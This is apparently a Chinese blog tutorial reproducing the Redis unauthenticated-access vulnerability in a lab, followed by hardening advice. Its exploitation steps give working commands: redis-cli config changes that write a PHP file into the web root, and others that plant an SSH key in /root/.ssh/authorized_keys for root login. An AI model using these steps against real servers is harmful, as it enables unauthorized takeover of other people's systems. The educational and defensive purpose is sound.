Redis未授权漏洞复现

简介

        Redis 默认情况下，会绑定在本地6379端口，如果没有进行相关策略，会将 Redis 服务暴露到公网上，在没有设置密码认证（默认为空)的情况下，任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的config 命令，可以进行写文件操作，可以将ssh公钥写入目标服务器的 /root/.ssh/authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。

环境搭建

下载redis软件包：

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

tar xzvf redis-2.8.17.tar.gz #解压安装包

cd redis-2.8.17        #进入redis目录

make             #编译

cp usr/redis-server /usr/bin/

cp usr/redis-cli /usr/bin/   #将redis-server和redis-cli拷贝到/usr/bin目录下

cp redis.conf /etc/       #将redis.conf拷贝到/etc/目录下

redis-server /etc/redis.conf   #使用/etc/目录下的redis.conf文件中的配置启动

redis-server启动redis数据库服务：

redis客户端“redis-cli”.

漏洞利用

写入webshell

需要目标开启了网页服务，然后写webshell到网站目录。

可以先使用nmap探测一下：

利用：

redis-cli -h ip -p port  #不指定端口的话默认是6379

info

config set dir /var/www/html

config set dbfilename redis-test.PHP

set test-webshell "<?PHP PHPinfo();?>"

save

然后查看一下目标机器这边网页目录：

成功写入。

SSH免密码登录

将自己的公钥储存在远程主机上，登录时远程主机会向用户发送一段随机字符串，用自己的私钥加密后再发回来。远程主机用事先储存的公钥进行解密，如果成功则允许直接空密码ssh登录。

先探测ssh端口开放：

在本地生成公钥文件(回车默认即可)：

 ssh-keygen -t rsa

生成的文件路径在用户的家目录的".ssh"文件夹下：

cd ~/.ssh | ls

将秘钥写入一个文件用于查看并上传redis服务器：

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

将key.txt里面的内容写入远程的 Redis 服务器上并且设置其 Key为一个命令（这里设置的test）:

如果上传报错的话，可能是主机处于保护模式只允许redis本地链接，需要修改配置文件../redis.conf 需要在服务器上关闭保护模式：

redis-cli -h ip -p port

config set protected-mode no

然后再尝试一下上传，返回ok即上传成功。

登录redis服务器查看公钥已经添加到 Redis 的服务器上了并执行如下命令：

keys *

get test

config set dir /root/.ssh

config set dbfilename authorized_keys

save

测试ssh登录：

ssh -i id_rsa root@ip

 登录成功。

 

修复建议

1./etc/redis.conf 中找到 “requirepass” 字段在后面设置复杂口令

2./etc/redis.conf中配置protected-mode yes

3.更改默认端口

---

结语

已无暇顾及过去，要向前走。

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 [email protected] 举报，一经查实，本站将立刻删除。